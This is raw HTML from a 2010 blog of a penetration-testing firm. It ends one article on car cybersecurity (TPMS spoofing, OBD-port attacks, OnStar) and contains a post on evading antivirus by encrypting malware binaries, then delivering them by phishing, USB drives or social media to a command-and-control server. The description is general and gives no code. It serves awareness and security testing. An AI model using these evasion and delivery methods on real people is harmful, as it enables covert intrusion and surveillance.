font-style: inherit; font-size: 16px; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;" width="287" /></td> </tr> </table> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Often the innovations are designed to improve the safety of the cars. For instance, after a recall of Firestone tires that were failing in Fords in 2000, Congress passed the TREAD (Transportation Recall Enhancement, Accountability and Documentation) Act that required that tire pressure monitoring systems (TPMS) be installed in new cars to alert drivers if a tire is underinflated.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Wireless tire pressure monitoring systems, which also were touted as a way to increase fuel economy, communicate via a radio frequency transmitter to a tire pressure control unit that sends commands to the central car computer over the Controller-Area Network (CAN). The CAN bus, which allows electronics to communicate with each other via the On-Board Diagnostics systems (OBD-II), is then able to trigger a warning message on the vehicle dashboard.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Researchers at the University of South Carolina and Rutgers University tested two tire pressure monitoring systems and found the security to be lacking. They were able to turn the low-tire-pressure warning lights on and off from another car traveling at highway speeds from 40 meters (120 feet) away and using low-cost equipment.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"While spoofing low-tire-pressure readings does not appear to be critical at first, it will lead to a dashboard warning and will likely cause the driver to pull over and inspect the tire," said the report (<a href="http://www.winlab.rutgers.edu/~Gruteser/papers/xu_tpms10.pdf" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">PDF</a>). "This presents ample opportunities for mischief and criminal activities, if past experience is any indication."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"TPMS is a major safety system on cars. It's required by law, but it's insecure," said Travis Taylor, one of the researchers who worked on the report. "This can be a problem when considering other wireless systems added to cars. What does that mean about future systems?"</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">The researchers do not intend to be alarmist; they're merely trying to figure out what the security holes are and to alert the industry to them so they can be fixed, said Wenyuan Xu, another researcher on the project. "We are trying to raise awareness before things get really serious," she said.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><a href="http://news.cnet.com/8301-27080_3-20005047-245.html" title="Hacking a car (Q&A) -- Friday, May 14, 2010" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">Another report</a> in May highlighted other risks with the increased use of computers coordinated via internal car networks. Researchers from the University of Washington and University of California, San Diego, tested how easy it would be to compromise a system by connecting a laptop to the onboard diagnostics port that they then wirelessly controlled via a second laptop in another car. Thus, they were able to remotely lock the brakes and the engine, change the speedometer display, as well as turn on the radio and the heat and honk the horn.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Granted, the researchers needed to have physical access to the inside of the car to accomplish the attack. Although that minimizes the likelihood of an attack, it's not unthinkable to imagine someone getting access to a car dropped off at the mechanic or parking valet.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"The attack surface for modern automobiles is growing swiftly as more sophisticated services and communications features are incorporated into vehicles," that report (<a href="http://www.autosec.org/pubs/cars-oakland2010.pdf" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: verdana, sans-serif; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">PDF</a>) said. "In the United States, the federally-mandated On-Board Diagnostics port, under the dash in virtually all modern vehicles, provides direct and standard access to internal automotive networks. User-upgradable subsystems such as audio players are routinely attached to these same internal networks, as are a variety of short-range wireless devices (Bluetooth, wireless tire pressure sensors, etc.)."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><strong style="font-weight: bold;">Engine Control Units</strong><br />The ubiquitous Engine Control Units themselves started arriving in cars in the late 1970s as a result of the California Clean Air Act and initially were designed to boost fuel efficiency and reduce pollution by adjusting the fuel and oxygen mixture before combustion, the paper said. "Since then, such systems have been integrated into virtually every aspect of a car's functioning and diagnostics, including the throttle, transmission, brakes, passenger climate and lighting controls, external lights, entertainment, and so on," the report said.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">It's not just that there are so many embedded computers, it's that safety critical systems are not isolated from non-safety critical systems, such as entertainment systems, but are "bridged" together to enable "subtle" interactions, according to the report. In addition, automakers are linking Engine Control Units with outside networks like global positioning systems. GM's OnStar system, for example, can detect problems with systems in the car and warn drivers, place emergency calls, and even allow OnStar personnel to r emotely unlock cars or stop them, the report said.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">In an article entitled "<a href="http://www .eetimes.com/electronics-blogs/davek-s-embedded-security-blog/4204921/Smart-phone-security-in-cars" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">Smart Phone + Car = Stupid?</a>" on the EETimes site in late July, Dave Kleidermacher noted that GM is adding smartphone connectivity to most of its 2011 cars via OnStar. "For the first time, engines can now be started and doors locked by ordinary consumers, from anywhere on the planet with a cell signal," he wrote.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Car manufacturers need to design the systems with security in mind, said Kleidermacher, who is chief technology officer at <a href="http://www.ghs.com/" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; cursor: pointer; padding: 0px; margin: 0px;">Green Hills Software</a>, which builds operating system software that goes into cars and other embedded systems.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"You can not retrofit high-level security to a system that wasn't designed for it," he told CNET. "People are building this sophisticated software into cars and not designing security in it from the ground up, and that's a recipe for disaster."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Representatives from <a href="http://www.on star.com/web/portal/home" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">GM OnStar</a> were not available for comment late last week or this week, a spokesman said.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"Technology in cars is not designed to be secure because there's no perceived threat. They don't think someone is going to hack a car like they're going to hack a bank," said Desautels of Netragard. "For the interim, network security in cars won't be a primary concern for manufacturers. But once they get connected to the Internet and have IP addresses, I think they'll be targeted just for fun."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">The threat is primarily theoretical at this point for a number of reasons. First, there isn't the same financial incentive to hacking cars as there is to hacking online bank accounts. Secondly, there isn't one dominant platform used in cars that can give attackers the same bang for their buck to target as there is on personal computers.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"The risks are certainly increasing because there are more and more computers in the car, but it will be much tougher to (attack) than with the PC," said Egil Juliussen, a principal analyst at market researcher firm <a href="http://www.isuppli.com/" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">iSuppli</a>. "There is no equivalent to Windows in the car, at least not yet, so (a hacker) will be dealing with a lot of different systems and have to have some knowledge about each one. It doesn't mean a determined hacker couldn't do it."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">But Juliussen said drivers don't need to worry about anything right now. "This is not a problem this year or next year," he said. "Its five years down the road, but the way to solve it is to build security into the systems now."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><strong style="font-weight: bold;">Infotainment systems</strong><br />In the meantime, the innovations in mobile communications and entertainment aren't limited to smartphones and iPads. People want to use their devices easily in their cars and take advantage of technology that will let them make calls and listen to music without having to push any buttons or touch any track wheels. Hands-free telephony laws in states are requiring this.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Millions of drivers are using the <a style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">SYNC</a> system that has shipped in more than 2 million Ford cars that allows people to connect digital media players and Bluetooth-enabled mobile phones to their car entertainment system and use voice commands to operate them. The system uses Microsoft Auto as the operating system. Other cars offer less-sophisticated mobile device connectivity.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"A lot of cars have Bluetooth car kits built into them so you can bring the cell phone into your car and use your phone through microphones and speakers built into the car," said Kevin Finisterre, lead researcher at Netragard. "But vendors often leave default passwords."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Ford uses a variety of security measures in SYNC, including only allowing Ford-approved software to be installed at the factory and default security set to Wi-Fi Protected Access 2 (WPA2), which requires users to enter a randomly chosen password to connect to the Internet. To protect customers when the car is on the road and the Mobile Wi-Fi Hot Spot feature is enabled, Ford also uses two firewalls on SYNC, a network firewall similar to a home Wi-Fi router and a separate central processing unit that prevents unauthorized messages from bei ng sent to other modules within the car.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"We use the security models that normal IT folks use to protect an enterprise network," said Jim Buczkowski, global director of electrical and electronics systems engineering for Ford SYNC.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Not surprisingly, there is a competing vehicle "infotainment" platform being developed that is based on open-source technology. About 80 companies have formed the <a href="http://www.genivi.org/" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">Genivi Alliance</a> to create open standards and middleware for information and entertainment solutions in cars.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Asked if Genivi is incorporating security into its platform from the get-go, Sebastian Zimmermann, chair of the consortium's product definition and planning group, said it is up to the manufacturers that are creating the branded devices and custom apps to build security in and to take advantage of security mechanisms provided in Linux, the open-source operating system the platform is based on.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"Automakers are aware of security and have taken it seriously...It's increasingly important as the vehicle opens up new interfaces to the outside world," Zimmermann said. "They are trying to find a balance between openness and security."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Another can of security worms being opened is the fact that cars may follow the example of smart phones and Web services by getting their own customized third-party apps. Hughes Telematics <a href="http://www.cnn.com/2009/TECH/10/08/apps.realworld/" style="font-size: 11px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">reportedly</a> is working with automakers on app stores for drivers.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">This is already happening to some extent, for instance, with video cameras becoming standard in police cars and school buses, bringing up a host of security and privacy issues.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"We did a penetration test where we had a police agency that has some in-car cameras," Finisterre of Netragard said, "and we were able to access the cameras remotely and have live audio and video streams from the police car due to vulnerabilities in the manufacturing systems."</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"I'm sure (eventually) there is going to be smart pavement and smart lighting and other dumb stuff that has the capability of interacting with the car in the future," he said. "Technology is getting pushed out the door with bells and whistles and security gets left behind."</p> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> </td> </tr> </table> <p class="image-caption" style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> </div> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"><p /><span style="font-weight: inherit; font-style: inherit; font-size: 16px; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><br /></span></p> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <p><p /></p> <p /> <p> </p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-72232801507765354542010-08-06T15:52:00.000-07:002010-08-06T18:43:19.360-07:00Bypassing Antivirus to Hack You<div style="text-align: left;">Many people assume that running antivirus software will protect them from <span class="blsp-spelling-error" id="SPELLING_ERROR_0">malware</span> (viruses, worms, <span class="blsp-spelling-error" id="SPELLING_ERROR_1">trojans</span>, etc), but in reality the software is only partially effective. This is true because antivirus software can only detect <span class="blsp-spelling-error" id="SPELLING_ERROR_2">malware</span> that it knows to look for. Anything that <span class="blsp-spelling-error" id="SPELLING_ERROR_3">doesn</span>’t match a known <span class="blsp-spelling-error" id="SPELLING_ERROR_4">malware</span> pattern will pass as a clean and trusted file.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><div style="text-align: center;"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 287px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLjARroeOUoqIFYgYLRAgfARrbItnIL8AC117NWZsR9h3b1tI1KkPo87-nh4NSpcxoW07PRZDrj5JJg3rEyICcuM7ppikydUy5ghLNDBdG01CYIVd0q29o0nVhL5Nwr97sfhJXVtHhwAU/s400/Screen+shot+2010-08-06+at+8.07.37+PM.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5502462209558502962" /></div></div><div style="text-align: left;"><div style="text-align: center;"><br /></div><div style="text-align: left;">Antivirus technologies use virus definition files to define known <span class="blsp-spelling-error" id="SPELLING_ERROR_5">malware</span> patterns. Those patterns are derived from real world <span class="blsp-spelling-error" id="SPELLING_ERROR_6">malware</span> variants that are captured in the wild. It is relatively easy to bypass most antivirus technologies by creating new <span class="blsp-spelling-error" id="SPELLING_ERROR_7">malware</span> or modifying existing <span class="blsp-spelling-error" id="SPELLING_ERROR_8">malware</span> so that it does not contain any identifiable patterns.</div><div style="text-align: center;"><br /></div><div style="text-align: left;">One of the modules that our customers can activate when purchasing Penetration Testing services from us, is the Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_9">Malware</span> module. As far as we know, we are one of the few Penetration Testing companies to actually use Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_10">Malware</span> during testing. This module enables our customers to test how effective their defenses are against real world <span class="blsp-spelling-error" id="SPELLING_ERROR_11">malware</span> threats but in a safe and controllable way. </div><div style="text-align: center;"><br /></div><div style="text-align: left;">Our choice of Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_12">Malware</span> depends on the target that we intend to penetrate and the number of systems that we intend to compromise. Sometimes we’ll use Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_13">Malware</span> that <span class="blsp-spelling-error" id="SPELLING_ERROR_14">doesn</span>’t automatically propagate and other times we’ll use auto-propagation. We should mention that this Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_15">Malware</span> is only “Pseudo” because we don’t do anything harmful with it and we use it ethically. The fact of the matter is that this Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_16">Malware</span> is very real and very capable technology.</div><div style="text-align: center;"><br /></div><div style="text-align: left;">Once we’<span class="blsp-spelling-error" id="SPELLING_ERROR_17">ve</span> determined what Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_18">Malware</span> variant to go with, we need to augment the Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_19">Malware</span> so that it is not detectable by antivirus scanners. We do this by encrypting the Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_20">Malware</span> binary with a special binary encryption tool. This tool ensures that the binary no longer contains patters that are detectable by antivirus technologies. </div><div style="text-align: center;"><br /></div></div><p class="MsoNormal"><b>Before Encryption:</b></p><p class="MsoNormal"><b></b></p><div style="text-align: center;"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 318px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3_pEf99ISkeNW-FKpKWZM5Mr2yJuH0nuCuPmi4uryfG2L23RUurpDlW4odOaV2iAFaqARO03PYMWg4a7v4NG3KS20ZOb3Sr8gbjWLIW_W5ScGEE5_A8vIP4vTBgU8NymAkUqUBrWtvwQ/s400/dirty.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5502461802106307042" /></div><p class="MsoNormal"></p><p class="MsoNormal"><b><br /></b></p><p class="MsoNormal"><b>After Encryption: (Still Infected)</b></p><p class="MsoNormal"><b></b></p><p class="MsoNormal" style="text-align: center;"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3nQssuGRswXJAGcV6sA3ViLM8Cukc6jhKVs8FqBcKOhewWnskWR8h_7KSQv7ZgH7dy2Bq_Ctq5KW05gpWQHL-_vb7b8kNTD-INUn05dpyfs8Mq2s8lebxJ8uNhG1s811hk1raZNArvJ8/s400/clean.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5502461236207196898" /></p><p class="MsoNormal">As you can see from the scan results above, the Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_21">Malware</span> was detected by most antivirus scanners before it was encrypted. We expected this because we chose a variant of Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_22">Malware</span> that contained several known detectable patterns. The second image (after encryption) shows the same Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_23">Malware</span> being scanned after encryption. As you can see, the Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_24">Malware</span> passed all antivirus scanners as clean.</p><p class="MsoNormal">Now that we've prevented antivirus software from being able to detect our Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_25">Malware</span>, we need to distribute it to our victims. Distribution can happen many ways that include but are not limited to infected <span class="blsp-spelling-error" id="SPELLING_ERROR_26">USB</span> drives, infected CD-<span class="blsp-spelling-error" id="SPELLING_ERROR_27">ROM's</span>, <span class="blsp-spelling-error" id="SPELLING_ERROR_28">Phishing</span> emails augmented by <span class="blsp-spelling-error" id="SPELLING_ERROR_29">IDN</span> homograph attacks with the Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_30">Malware</span> attached, <span class="blsp-spelling-error" id="SPELLING_ERROR_31">Facebook</span>, <span class="blsp-spelling-error" id="SPELLING_ERROR_32">LinkedIn</span>, <span class="blsp-spelling-error" id="SPELLING_ERROR_33">MySpace</span>, binding to <span class="blsp-spelling-error" id="SPELLING_ERROR_34">PDF</span> like files, etc.</p><p class="MsoNormal">Our <span class="blsp-spelling-corrected" id="SPELLING_ERROR_35">preferred</span> method for infection is email (or maybe not). This is because it is usually very easy to gather email addresses using various existing email harvesting technologies and we can hit a large number of people at the same time. When using email, we may embed a link that points directly to our Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_36">Malware</span>, or we might just insert the <span class="blsp-spelling-error" id="SPELLING_ERROR_37">malware</span> directly into the email. Infection simply requires that the user click our link or run the attached executable. In either case, the Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_38">Malware</span> is fast and quiet and the user doesn't notice anything strange.</p><p class="MsoNormal">Once a computer is infected with our Pseudo <span class="blsp-spelling-error" id="SPELLING_ERROR_39">Malware</span> it connects back to our <a href="http://en.wikipedia.org/wiki/Botnet">Command and Control server</a> and grants us access to the system <span class="blsp-spelling-error" id="SPELLING_ERROR_40">unbeknownst</span> to the user. Once we have access we can do anything that the user can do including but not limited to seeing the users screen as if we were right there, running programs, installing software, <span class="blsp-spelling-error" id="SPELLING_ERROR_41">uninstalling</span> software, activating web cam's and microphones, accessing and manipulating hardware, etc. More importantly, we can use that computer to compromise the rest of the network through a process called <a href="http://www.phrack.org/issues.html?issue=55&id=16">Distributed Metastasis</a>. </p><p class="MsoNormal">Despite how easy it is to bypass antivirus technologies, we still very strongly recommend using them as they keep you protected from known <span class="blsp-spelling-error" id="SPELLING_ERROR_42">malware</span> variants. </p><p class="MsoNormal"><br /></p><p class="MsoNormal"><br /></p><p class="MsoNormal"><br /></p><p class="MsoNormal"><br /></p><p class="MsoNormal"><br /></p> <!--EndFragment--><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-58079504592886313672010-06-14T04:14:00.001-07:002010-06-14T17:08:08.657-07:00Security Vulnerability Penetration Assessment Test?Our philosophy here at Netragard is that security-testing services must produce a threat that is at least equal to the threat that our customers are likely to face in the real world. If we test our customers at a lesser threat level and a higher-level threat attempts to align with their risks, then they will likely suffer a compromise. If they do suffer a compromise, then the money that they spent on testing services might as well be added to the cost in damages that result from the breach.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 